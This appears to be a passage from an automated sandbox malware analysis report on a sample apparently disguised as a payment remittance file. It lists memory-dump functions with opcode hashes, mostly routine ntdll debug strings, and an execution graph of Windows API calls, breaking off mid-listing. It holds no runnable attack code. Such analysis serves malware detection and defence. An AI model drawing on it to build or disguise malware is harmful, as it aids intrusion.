                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 979ca67777c7ddba210517ea99413d33f596dd1518202b4ef7ef77cab9909ab7
                                            • Instruction ID: 10f16ebddbe684807e213f68d65b796ff0621cbb5c77b969d84c9cc2149e571e
                                            • Opcode Fuzzy Hash: 979ca67777c7ddba210517ea99413d33f596dd1518202b4ef7ef77cab9909ab7
                                            • Instruction Fuzzy Hash: 3790022160540502D20171584408616408A97D4241F95C032A1024565ECA258B92A232
                                            Function 017D3010 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8db26d0648c61b2fe9456ede3fd4bb2677d1811b3e27451cab5f84a405c95e38
                                            • Instruction ID: 1708fb0e4da644f26a5beac273baa399eaa7b372b4c3d3e4ae261d7d88d3a4d3
                                            • Opcode Fuzzy Hash: 8db26d0648c61b2fe9456ede3fd4bb2677d1811b3e27451cab5f84a405c95e38
                                            • Instruction Fuzzy Hash: 5390022120584442D24072584808B0F818597E5202F95C029A4156564CC9158A555722
                                            Function 017D3090 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0ba1911d6b534125fb269931e9bea29c2924a96b68648d919b0e9f6bcb2050f
                                            • Instruction ID: 7b198bd8e7b458dfc82464159d4177059c9417511057ac3f881cc995840d23bb
                                            • Opcode Fuzzy Hash: e0ba1911d6b534125fb269931e9bea29c2924a96b68648d919b0e9f6bcb2050f
                                            • Instruction Fuzzy Hash: D390022124540802D240715884187074086D7D4601F55C021A0024564DC6168B6567B2
                                            Function 017D39B0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c4409941e3e5282aa674682ce5707d7211f039a99316ba5a0173dae1d5f0d11
                                            • Instruction ID: bf70bc150b8b0e5a58672f0da946d4d94266f4c88b94360583737b231a3d456d
                                            • Opcode Fuzzy Hash: 9c4409941e3e5282aa674682ce5707d7211f039a99316ba5a0173dae1d5f0d11
                                            • Instruction Fuzzy Hash: 2290022124945102D250715C44086168085B7E4201F55C031A08145A4DC5558A556322
                                            Function 017D3D70 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 735044948f1edc91db0943d4322375a31225f505ef0b7f54e71da1c9b7a52eec
                                            • Instruction ID: 009cc0530e7b1b6bdb5bca36348f692083311b3074fa65884ccdd8187048ac25
                                            • Opcode Fuzzy Hash: 735044948f1edc91db0943d4322375a31225f505ef0b7f54e71da1c9b7a52eec
                                            • Instruction Fuzzy Hash: 2D90023520540402D6107158580864640C697D4301F55D421A0424568DC6548AA1A222
                                            Function 017D3D10 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 95ee7e2fb3fcb482b3687691da2d50cb202350541f82b4384b47714275fc153e
                                            • Instruction ID: 5e56b9b4fa441f21852923bb7dbad198a659d6b815cd7cbd22da94c25f33fcd2
                                            • Opcode Fuzzy Hash: 95ee7e2fb3fcb482b3687691da2d50cb202350541f82b4384b47714275fc153e
                                            • Instruction Fuzzy Hash: 6190023120640142964072585808A4E818597E5302B95D425A0015564CC9148A615322
                                            Function 017D2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: ad845efdc78c852db2baae793369cbdd99d8e48f166cbc3396e1b2cd4a36796c
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Function 017D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 3984864962ffd206435a452c4f62a95ad2eba53939babf565037f0def3d438c0
                                            • Instruction ID: 74fad6ec5455cf71629af8be2d18d19d821f75ede45a8b59d2a52d845f259943
                                            • Opcode Fuzzy Hash: 3984864962ffd206435a452c4f62a95ad2eba53939babf565037f0def3d438c0
                                            • Instruction Fuzzy Hash: 0F51F9B5A0421ABFDB25DBACCC9097EFBF8BB082407148169F455E7646D374DF4187A0
                                            Function 01842410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: c51f1d8cf00e59f292c841046492e08cbfdfa8749b84e4aece1b7b697e11b3ce
                                            • Instruction ID: 7e997d2febe126dace6dbb33cc9d665e1c2cc5b46bd2a691250507c46d86bfa7
                                            • Opcode Fuzzy Hash: c51f1d8cf00e59f292c841046492e08cbfdfa8749b84e4aece1b7b697e11b3ce
                                            • Instruction Fuzzy Hash: 2951F575A08649AFCB20DE9CD89097EFBFAEF48300B048459F496C7641EAB4DB40C7A0
                                            Function 017C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                            Download Yara Rule
                                            Strings
                                            • Execute=1, xrefs: 01804713
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01804787
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01804655
                                            • ExecuteOptions, xrefs: 018046A0
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01804725
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018046FC
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01804742
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 40cff2c5f4fbccf5d7a38e444d457ca23646368f486634c129314aa4e467f835
                                            • Instruction ID: 14a3957569050ce24abca95974e5778a089ec17e6449d15975882edd4cc000dc
                                            • Opcode Fuzzy Hash: 40cff2c5f4fbccf5d7a38e444d457ca23646368f486634c129314aa4e467f835
                                            • Instruction Fuzzy Hash: 4D51267160021DAAEF25AAA8DC99BAEF7B8EF14B00F0400EDD605A7181EB709B458F50
                                            Function 01866940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                            • Instruction ID: 8611d5f5d13247184e70757ab4a8adbc029d1cc6aea9a5983d179d346d77a880
                                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                            • Instruction Fuzzy Hash: B3021671508382AFD305CF18C894A6BBBE9EFC4704F148A2DF9858B254EB35EA45CB42
                                            Function 017DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: 60d5923a0da840c0473ac73ac1afda2e3b02cbcc376b00b8fb326f8d6b00d551
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: 9D81A070E4524D9FEF258E6CC8917FEFBB1AF46360F1E425AE861A7291C7349840CB61
                                            Function 018420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$[$]:%u
                                            • API String ID: 48624451-2819853543
                                            • Opcode ID: 96b51515d9a49118bf7fadd51163d17543b38cbd81d33b0649b4783178d8226c
                                            • Instruction ID: 91eb755b2e585d7b8bae1926066ec4f3dd823c38b30fe142a21e609db9107605
                                            • Opcode Fuzzy Hash: 96b51515d9a49118bf7fadd51163d17543b38cbd81d33b0649b4783178d8226c
                                            • Instruction Fuzzy Hash: CD21517AA0051DABDB10DF69D844AAEBBF9AF58744F040126F905E3204EB30EA01CBA1
                                            Function 017BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018002BD
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018002E7
                                            • RTL: Re-Waiting, xrefs: 0180031E
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 44cb80b936c91fef0c63ad4eeff5b2c9a99cd392dc5ddca842d45d5c147b25f8
                                            • Instruction ID: d67ed5f69d91113b7b4912a22249ac0df49a3e257da353add00a1df56c8e8430
                                            • Opcode Fuzzy Hash: 44cb80b936c91fef0c63ad4eeff5b2c9a99cd392dc5ddca842d45d5c147b25f8
                                            • Instruction Fuzzy Hash: CCE1BC306087469FD726CF28CC84B6ABBE0BB84B54F140A6DF5A5CB2E1D774DA44CB42
                                            Function 017CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 01807BAC
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01807B7F
                                            • RTL: Resource at %p, xrefs: 01807B8E
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: 2009c07050155d3eca9412a86123cdaa369b4d7d194c8f6335c91e3c2064776b
                                            • Instruction ID: 5a2b8700d80ca0c5a83a9a4779922a41d3f5936c0a56f32b8947b7a7f66ae4a7
                                            • Opcode Fuzzy Hash: 2009c07050155d3eca9412a86123cdaa369b4d7d194c8f6335c91e3c2064776b
                                            • Instruction Fuzzy Hash: 7041CF317047079BD721DE29CC51B6AB7E5EB98B10F000A1DFA9ADB780DB31E9058B92
                                            Function 017CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0180728C
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 018072C1
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01807294
                                            • RTL: Resource at %p, xrefs: 018072A3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: 6facce7decf71e09af56c5c8c335a7a8a50ee645aa7c8bc2cdfa55777cdd7939
                                            • Instruction ID: 7050d5ca363e4ae562d84603a738396d11b9213e6a98642fd6bae2c3901d61db
                                            • Opcode Fuzzy Hash: 6facce7decf71e09af56c5c8c335a7a8a50ee645aa7c8bc2cdfa55777cdd7939
                                            • Instruction Fuzzy Hash: 7341127160420AABC721CE29CC42B66F7A5FF94B50F10061CF996DB280DB30FA5687D1
                                            Function 01842300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: ebceabd5d3423b14cf3304ca19404d3bcd8e95d5e1fede8e2a7c69c864f6a5e9
                                            • Instruction ID: 815873299e08316178778efd42b26061ff09c9749a755251a14a29620a59a8e0
                                            • Opcode Fuzzy Hash: ebceabd5d3423b14cf3304ca19404d3bcd8e95d5e1fede8e2a7c69c864f6a5e9
                                            • Instruction Fuzzy Hash: C0314F72A0062D9FDB20DF2DDC44BAEB7F9EB54710F54455AF949E3244EF30AA448BA0
                                            Function 017D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: 7545df9eb6f2718606692a5f984381c105600b05939f10efcecd7f129ac1c82d
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: 8291B271E0021E9BEB38DF6DC881ABEFBB1EF44328F54455AE955E72C4E73089818761
                                            Function 01799126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: de824c4c3a53d4ec9959c307d3afd162fb85e0c815c6f57e330c104bb41df6bd
                                            • Instruction ID: 77ce82aa303c67f46c016b86ca409547d03810b0bafd4f46f87e2d02fd2ec5d3
                                            • Opcode Fuzzy Hash: de824c4c3a53d4ec9959c307d3afd162fb85e0c815c6f57e330c104bb41df6bd
                                            • Instruction Fuzzy Hash: 76810C71D002699BDB35CB54CC45BEEB7B4AF48714F1041DAEA19B7680E7309E84CFA0

                                            Execution Graph

                                            Execution Coverage:11.8%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:373
                                            Total number of Limit Nodes:14
                                            execution_graph 41777 7208c20 41778 7208c2e 41777->41778 41779 7208cb4 41778->41779 41780 7208c3f 41778->41780 41787 7205634 41779->41787 41783 7205634 2 API calls 41780->41783 41782 7208cbb 41784 7208c54 41783->41784 41785 7205634 2 API calls 41784->41785 41786 7208c8d 41785->41786 41789 720563f 41787->41789 41788 7208d98 41788->41782 41789->41788 41791 7205740 41789->41791 41792 720574b 41791->41792 41797 7209210 41792->41797 41801 7208fe8 41792->41801 41805 7209201 41792->41805 41793 72091e9 41793->41788 41798 7209221 41797->41798 41799 7208fe8 2 API calls 41798->41799 41800 720922a 41799->41800 41800->41793 41802 7208ff3 41801->41802 41809 7209018 41802->41809 41804 7209275 41804->41793 41806 7209210 41805->41806 41807 7208fe8 2 API calls 41806->41807 41808 720922a 41807->41808 41808->41793 41810 7209023 41809->41810 41814 119830b 41810->41814 41821 1195cc4 41810->41821 41811 720929b 41811->41804 41815 1198313 41814->41815 41817 11985cb 41815->41817 41828 119ac7b 41815->41828 41816 1198609 41816->41811 41817->41816 41833 119cd68 41817->41833 41838 119cd78 41817->41838 41822 1195ccf 41821->41822 41824 11985cb 41822->41824 41825 119ac7b 2 API calls 41822->41825 41823 1198609 41823->41811 41824->41823 41826 119cd78 2 API calls 41824->41826 41827 119cd68 2 API calls 41824->41827 41825->41824 41826->41823 41827->41823 41829 119ac85 41828->41829 41843 119acb0 41829->41843 41846 119aca0 41829->41846 41830 119ac8e 41830->41817 41835 119cd99 41833->41835 41834 119cdbd 41834->41816 41835->41834 41870 119cf19 41835->41870 41874 119cf28 41835->41874 41839 119cd99 41838->41839 41840 119cdbd 41839->41840 41841 119cf19 2 API calls 41839->41841 41842 119cf28 2 API calls 41839->41842 41840->41816 41841->41840 41842->41840 41850 119ada8 41843->41850 41844 119acbf 41844->41830 41847 119acb0 41846->41847 41849 119ada8 2 API calls 41847->41849 41848 119acbf 41848->41830 41849->41848 41851 119adb9 41850->41851 41852 119addc 41850->41852 41851->41852 41858 119b030 41851->41858 41862 119b040 41851->41862 41852->41844 41853 119add4 41853->41852 41854 119afe0 GetModuleHandleW 41853->41854 41855 119b00d 41854->41855 41855->41844 41859 119b040 41858->41859 41861 119b079 41859->41861 41866 119a130 41859->41866 41861->41853 41863 119b054 41862->41863 41864 119b079 41863->41864 41865 119a130 LoadLibraryExW 41863->41865 41864->41853 41865->41864 41868 119b220 LoadLibraryExW 41866->41868 41869 119b299 41868->41869 41869->41861 41871 119cf28 41870->41871 41872 119cf6f 41871->41872 41878 119bae0 41871->41878 41872->41834 41875 119cf35 41874->41875 41876 119bae0 2 API calls 41875->41876 41877 119cf6f 41875->41877 41876->41877 41877->41834 41879 119bae5 41878->41879 41881 119dc88 41879->41881 41882 119d2dc 41879->41882 41881->41881 41883 119d2e7 41882->41883 41884 1195cc4 2 API calls 41883->41884 41885 119dcf7 41884->41885 41885->41881 41951 1194668 41952 119467a 41951->41952 41953 1194686 41952->41953 41957 1194779 41952->41957 41962 1193e28 41953->41962 41955 11946a5 41958 119479d 41957->41958 41966 1194878 41958->41966 41970 1194888 41958->41970 41963 1193e33 41962->41963 41978 1195c44 41963->41978 41965 1197048 41965->41955 41968 1194888 41966->41968 41967 119498c 41968->41967 41974 11944b0 41968->41974 41971 11948af 41970->41971 41972 119498c 41971->41972 41973 11944b0 CreateActCtxA 41971->41973 41973->41972 41975 1195918 CreateActCtxA 41974->41975 41977 11959db 41975->41977 41979 1195c4f 41978->41979 41982 1195c64 41979->41982 41981 11970ed 41981->41965 41983 1195c6f 41982->41983 41986 1195c94 41983->41986 41985 11971c2 41985->41981 41987 1195c9f 41986->41987 41988 1195cc4 2 API calls 41987->41988 41989 11972c5 41988->41989 41989->41985 41990 6e48810 41991 6e4899b 41990->41991 41993 6e48836 41990->41993 41993->41991 41994 6e463a4 41993->41994 41995 6e48a90 PostMessageW 41994->41995 41996 6e48afc 41995->41996 41996->41993 41901 7201248 41902 720125a 41901->41902 41904 7201270 41901->41904 41905 72002d8 41902->41905 41906 72002e3 41905->41906 41907 72016c6 41906->41907 41910 7202a40 41906->41910 41915 7202a50 41906->41915 41907->41904 41914 7202a50 41910->41914 41911 7202a86 41911->41906 41914->41911 41920 72026fc 41914->41920 41917 7202a71 41915->41917 41916 7202a86 41916->41906 41917->41916 41918 72026fc 2 API calls 41917->41918 41919 7202ad6 41918->41919 41921 7202707 41920->41921 41924 7203834 41921->41924 41923 7202ad6 41925 720383f 41924->41925 41926 7204651 41925->41926 41931 7205120 41925->41931 41936 7205170 41925->41936 41940 7205160 41925->41940 41926->41923 41927 7204755 41927->41923 41932 7205123 41931->41932 41933 720512b 41932->41933 41947 7203a0c 41932->41947 41933->41927 41937 7205186 41936->41937 41938 7203a0c DrawTextExW 41937->41938 41939 720518d 41938->41939 41939->41927 41941 72051e7 DrawTextExW 41940->41941 41942 720516a 41940->41942 41946 720524e 41941->41946 41944 7203a0c DrawTextExW 41942->41944 41945 720518d 41944->41945 41945->41927 41946->41927 41948 72051a8 DrawTextExW 41947->41948 41950 720518d 41948->41950 41950->41927 41886 119d040 41887 119d086 41886->41887 41891 119d618 41887->41891 41895 119d628 41887->41895 41888 119d173 41892 119d628 41891->41892 41898 119d27c 41892->41898 41896 119d27c DuplicateHandle 41895->41896 41897 119d656 41896->41897 41897->41888 41899 119d690 DuplicateHandle 41898->41899 41900 119d656 41899->41900 41900->41888 41997 6e4595a 42002 6e47690 41997->42002 42026 6e476f6 41997->42026 42051 6e47681 41997->42051 41998 6e45969 42003 6e476aa 42002->42003 42075 6e47dcf 42003->42075 42080 6e47c2e 42003->42080 42085 6e47c42 42003->42085 42091 6e47cc2 42003->42091 42096 6e481a2 42003->42096 42105 6e47b81 42003->42105 42109 6e47a81 42003->42109 42117 6e47d81 42003->42117 42122 6e47c60 42003->42122 42134 6e480a7 42003->42134 42139 6e48267 42003->42139 42144 6e48206 42003->42144 42149 6e47b5c 42003->42149 42154 6e47bf2 42003->42154 42159 6e47ef5 42003->42159 42164 6e47c74 42003->42164 42168 6e47bd4 42003->42168 42177 6e47fb4 42003->42177 42182 6e484ab 42003->42182 42187 6e47b09 42003->42187 42195 6e47d28 42003->42195 42004 6e476b2 42004->41998 42027 6e47684 42026->42027 42029 6e476f9 42026->42029 42030 6e48206 2 API calls 42027->42030 42031 6e48267 2 API calls 42027->42031 42032 6e480a7 2 API calls 42027->42032 42033 6e47c60 6 API calls 42027->42033 42034 6e47d81 2 API calls 42027->42034 42035 6e47a81 4 API calls 42027->42035 42036 6e47b81 2 API calls 42027->42036 42037 6e481a2 4 API calls 42027->42037 42038 6e47cc2 2 API calls 42027->42038 42039 6e47c42 2 API calls 42027->42039 42040 6e47c2e 2 API calls 42027->42040 42041 6e47dcf 2 API calls 42027->42041 42042 6e47d28 2 API calls 42027->42042 42043 6e47b09 4 API calls 42027->42043 42044 6e484ab 2 API calls 42027->42044 42045 6e47fb4 2 API calls 42027->42045 42046 6e47bd4 4 API calls 42027->42046 42047 6e47c74 2 API calls 42027->42047 42048 6e47ef5 2 API calls 42027->42048 42049 6e47bf2 2 API calls 42027->42049 42050 6e47b5c 2 API calls 42027->42050 42028 6e476b2 42028->41998 42029->41998 42030->42028 42031->42028 42032->42028 42033->42028 42034->42028 42035->42028 42036->42028 42037->42028 42038->42028 42039->42028 42040->42028 42041->42028 42042->42028 42043->42028 42044->42028 42045->42028 42046->42028 42047->42028 42048->42028 42049->42028 42050->42028 42052 6e4768f 42051->42052 42054 6e48206 2 API calls 42052->42054 42055 6e48267 2 API calls 42052->42055 42056 6e480a7 2 API calls 42052->42056 42057 6e47c60 6 API calls 42052->42057 42058 6e47d81 2 API calls 42052->42058 42059 6e47a81 4 API calls 42052->42059 42060 6e47b81 2 API calls 42052->42060 42061 6e481a2 4 API calls 42052->42061 42062 6e47cc2 2 API calls 42052->42062 42063 6e47c42 2 API calls 42052->42063 42064 6e47c2e 2 API calls 42052->42064 42065 6e47dcf 2 API calls 42052->42065 42066 6e47d28 2 API calls 42052->42066 42067 6e47b09 4 API calls 42052->42067 42068 6e484ab 2 API calls 42052->42068 42069 6e47fb4 2 API calls 42052->42069 42070 6e47bd4 4 API calls 42052->42070 42071 6e47c74 2 API calls 42052->42071 42072 6e47ef5 2 API calls 42052->42072 42073 6e47bf2 2 API calls 42052->42073 42074 6e47b5c 2 API calls 42052->42074 42053 6e476b2 42053->41998 42054->42053 42055->42053 42056->42053 42057->42053 42058->42053 42059->42053 42060->42053 42061->42053 42062->42053 42063->42053 42064->42053 42065->42053 42066->42053 42067->42053 42068->42053 42069->42053 42070->42053 42071->42053 42072->42053 42073->42053 42074->42053 42076 6e47b68 42075->42076 42200 6e44eb0 42076->42200 42204 6e44ea8 42076->42204 42077 6e481e7 42077->42004 42081 6e47c09 42080->42081 42208 6e44fa0 42081->42208 42212 6e44f99 42081->42212 42082 6e47f95 42082->42004 42086 6e47b80 42085->42086 42087 6e4813a 42086->42087 42216 6e448e0 42086->42216 42220 6e448d8 42086->42220 42087->42004 42088 